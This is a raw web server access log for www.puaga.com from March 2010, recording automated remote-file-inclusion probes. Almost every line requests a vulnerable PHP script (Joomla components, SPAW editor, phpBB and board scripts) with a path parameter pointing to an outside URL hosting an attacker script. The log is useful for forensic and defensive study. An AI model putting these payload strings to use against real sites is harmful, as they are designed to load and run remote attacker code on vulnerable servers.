88.191.94.188 - - [03/Mar/2010:04:50:19 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:50:19 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:50:22 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:50:23 -0800] "GET /logs/access_100217.log%20%20//guestbook1//admin.php?include_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:50:55 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:50:55 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:50:55 -0800] "GET /logs/access_100206.log//bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:51:03 -0800] "GET /logs/access_100206.log//bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:51:03 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:51:03 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [03/Mar/2010:04:51:17 -0800] "GET /logs/access_100126.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [03/Mar/2010:04:51:17 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [03/Mar/2010:04:51:17 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [03/Mar/2010:04:51:22 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:04:51:33 -0800] "GET /logs/access_100217.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:04:51:49 -0800] "GET /logs/access_100222.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:04:51:51 -0800] "GET /logs/access_100217.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:04:52:07 -0800] "GET /logs/access_100217.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:04:52:21 -0800] "GET /logs/access_100222.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:04:52:38 -0800] "GET /logs/access_100222.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:04:53:45 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:04:53:45 -0800] "GET /logs/access_100206.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:04:53:45 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:55:10 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:55:10 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:04:55:44 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:04:55:44 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:04:55:44 -0800] "GET /logs/access_100206.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:56:50 -0800] "GET /logs/access_100208.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:56:54 -0800] "GET /logs/access_100202.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:57:06 -0800] "GET /logs/access_100217.log////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:57:06 -0800] "GET /logs/access_100203.log////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:04:57:20 -0800] "GET /logs/access_100221.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:58:17 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:58:17 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:58:17 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:58:41 -0800] "GET /logs/access_100129.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:58:46 -0800] "GET /logs/access_100206.log%20%20//bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:58:59 -0800] "GET /logs/access_100206.log%20%20//bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:04:59:54 -0800] "GET /logs/access_100221.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:01:00 -0800] "GET /logs/access_100217.log////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:01:00 -0800] "GET /logs/access_100203.log////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:05:01:12 -0800] "GET /logs/access_100217.log//components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:05:01:12 -0800] "GET /logs//components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:05:01:12 -0800] "GET /components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:05:02:12 -0800] "GET /logs/access_100206.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:05:02:12 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:05:02:12 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:05:02:13 -0800] "GET /logs/access_100206.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:05:02:13 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:05:02:13 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:05:03:59 -0800] "GET /logs/access_100128.log//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.125.44.136 - - [03/Mar/2010:05:04:01 -0800] "GET /http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:05:04:18 -0800] "GET /logs/access_100202.log//components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:05:04:20 -0800] "GET /logs/access_100214.log//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:05:04:38 -0800] "GET /logs/access_100221.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:05:06:39 -0800] "GET /logs/access_100128.log//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:05:06:54 -0800] "GET /logs/access_100214.log//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:05:07:16 -0800] "GET /logs/access_100221.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [03/Mar/2010:05:09:30 -0800] "GET /logs/access_100208.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.petrus.com.ua/cgi-bin/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [03/Mar/2010:05:09:30 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.petrus.com.ua/cgi-bin/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [03/Mar/2010:05:09:30 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.petrus.com.ua/cgi-bin/etenid1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:05:10:34 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:05:10:34 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:05:10:35 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:05:10:36 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:05:10:40 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:05:11:43 -0800] "GET /logs/access_100206.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:05:12:25 -0800] "GET /logs/access_100221.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:05:13:21 -0800] "GET /logs/access_100206.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:05:13:56 -0800] "GET /logs/access_100128.log//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:05:13:58 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:05:13:58 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:05:13:58 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:05:14:03 -0800] "GET /logs/access_100221.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:05:14:12 -0800] "GET /logs/access_100214.log//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.125.44.136 - - [03/Mar/2010:05:15:25 -0800] "GET /http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
202.125.44.136 - - [03/Mar/2010:05:15:26 -0800] "GET /logs/http://nic.bupt.edu.cn/media/idx? HTTP/1.0" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
118.82.114.113 - - [03/Mar/2010:05:15:44 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb.root.path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [03/Mar/2010:05:15:44 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb.root.path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [03/Mar/2010:05:15:44 -0800] "GET /logs/access_100215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb.root.path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [03/Mar/2010:05:17:08 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb.root.path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [03/Mar/2010:05:17:08 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb.root.path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [03/Mar/2010:05:17:08 -0800] "GET /logs/access_100215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb.root.path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.125.44.136 - - [03/Mar/2010:05:17:56 -0800] "GET /logs/access_100204.log/http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:18:01 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:18:01 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:18:01 -0800] "GET /logs/access_100126.log%20%20//bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [03/Mar/2010:05:18:27 -0800] "GET /logs/access_091217.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:18:43 -0800] "GET /logs/access_100224.log%20%20//bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:05:18:45 -0800] "GET /ashnews.php?pathtoashnews=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:05:18:50 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:05:18:50 -0800] "GET /logs/access_100128.log%20%20//ashnews.php?pathtoashnews=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:05:19:18 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:05:19:18 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:05:19:19 -0800] "GET /logs/access_100219.log%20%20//ashnews.php?pathtoashnews=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:19:33 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:19:33 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:19:33 -0800] "GET /logs/access_100126.log%20%20//bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:20:15 -0800] "GET /logs/access_100224.log%20%20//bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:05:22:20 -0800] "GET /ashnews.php?pathtoashnews=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:05:22:22 -0800] "GET /logs/access_100128.log//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:05:22:37 -0800] "GET /logs/access_100214.log//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:23:06 -0800] "GET /logs/access_100126.log//bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:05:23:11 -0800] "GET /logs/access_100128.log%20%20//ashnews.php?pathtoashnews=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:05:23:11 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:23:14 -0800] "GET /logs/access_100224.log//bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:05:23:17 -0800] "GET /logs/access_100219.log%20%20//ashnews.php?pathtoashnews=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.122.251.114 - - [03/Mar/2010:05:23:30 -0800] "GET /logs/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [03/Mar/2010:05:23:51 -0800] "GET /logs/access_100203.log//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [03/Mar/2010:05:23:51 -0800] "GET /////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [03/Mar/2010:05:23:51 -0800] "GET /logs//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [03/Mar/2010:05:23:59 -0800] "GET /logs/access_100206.log//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.122.251.114 - - [03/Mar/2010:05:24:04 -0800] "GET /logs/access_100202.log%20%20/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:24:13 -0800] "GET /org/edu/i//skin/zero_vote/ask_password.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
